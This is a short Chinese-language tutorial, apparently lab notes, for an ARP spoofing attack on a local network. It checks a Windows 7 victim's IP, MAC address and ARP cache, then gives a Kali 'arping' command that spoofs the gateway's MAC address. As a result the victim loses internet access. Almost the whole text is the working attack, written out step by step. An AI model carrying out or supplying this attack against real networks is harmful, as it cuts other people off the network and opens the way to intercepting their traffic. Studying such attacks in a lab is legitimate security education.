前提:攻击者和受害者在同一片局域网内。
原理:将受害者的网关的mac地址修改了。
假设受害者为win7,打开win7命令窗口:
ipconfig 查看win7主机的ip地址、mac地址和网关的ip地址
arp -a 查看win7主机的arp缓存表 第一行是网关的ip地址和mac地址
ping baidu.com 检查是否能够正常上网
打开kali系统的终端:
arping -s 假mac地址 -S 目标网关 目标主机
此时,win7主机已经被攻击了。
在win7命令窗口输入ping baidu.com ,已经不能成功联网。